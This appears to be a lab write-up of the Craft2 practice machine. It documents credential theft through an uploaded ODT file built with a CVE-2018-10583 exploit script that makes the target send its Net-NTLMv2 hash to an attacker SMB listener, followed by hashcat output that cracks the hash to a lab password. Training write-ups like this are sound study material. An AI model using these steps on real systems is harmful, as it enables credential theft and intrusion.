InfoSec LAB

Craft2_Phishing

Created: 2 min read

Phishing

The target web application supports file upload that accepts ODT file, which strongly suggests that it might be possible to perform a phishing attack with a macro-enabled ODT payload.

Changing the file extension to .odt works. The response mentions that the file will be reviewed and they are aware of the macro phishing attempts.

Attempt 1 (Fail)

Uploading a macro-enabled ODT payload.

However, nothing is coming through on the listener. This is rather expected as they claim to be aware of the macro phishing attempts.

A different approach is required.

Attempt 2 (Success)

Looking up another way to exploit ODT file leads to an Exploit-DB entry. It’s also locally available and it targets CVE-2018-10583.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ python2 CVE-2018-10583.py                                                                            
 
    ____            __      ____  ____  ______
   / __ )____ _____/ /     / __ \/ __ \/ ____/
  / __  / __ `/ __  /_____/ / / / / / / /_
 / /_/ / /_/ / /_/ /_____/ /_/ / /_/ / __/
/_____/\__,_/\__,_/      \____/_____/_/
 
 
Create a malicious ODF document help leak NetNTLM Creds
 
By Richard Davy 
@rd_pentest
www.secureyourit.co.uk
 
 
Please enter IP of listener: 192.168.45.158
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ ll bad.odt           
8.0K -rw-rw-r-- 1 kali kali 5.7K Jul  4 18:50 bad.odt

Executing the exploit script generates the bad.odt file.

Upload complete

It hit the SMB server running on Kali as the thecybergeek user, and leaked the Net-NTLMv2 hash.

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft2]
└─$ hashcat -a 0 -m 5600 thecybergeek.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
THECYBERGEEK::CRAFT2:aaaaaaaaaaaaaaaa:9676029a44693e7df711a8a9b4e39fc5:0101000000000000006036ff03eddb017f86d67e0ef8c7a400000000010010004e007200410053004d004a006c004100030010004e007200410053004d004a006c0041000200100069006400730049005100750068005400040010006900640073004900510075006800540007000800006036ff03eddb010600040002000000080030003000000000000000000000000030000000ec7ca1882cb50297357209482d722c2f3d41a566d0cc3bd5a56b55a058cbb00a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100350038000000000000000000:winniethepooh
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: THECYBERGEEK::CRAFT2:aaaaaaaaaaaaaaaa:9676029a44693...000000
Time.Started.....: Fri Jul  4 18:55:18 2025 (0 secs)
Time.Estimated...: Fri Jul  4 18:55:18 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3033.2 kH/s (1.87ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12288/14344385 (0.09%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> hawkeye
Hardware.Mon.#1..: Util: 10%
 
Started: Fri Jul  4 18:55:16 2025
Stopped: Fri Jul  4 18:55:20 2025

Password hash cracked for the thecybergeek user; winniethepooh Validating against the target SMB server.

Interactive Graph View

Backlinks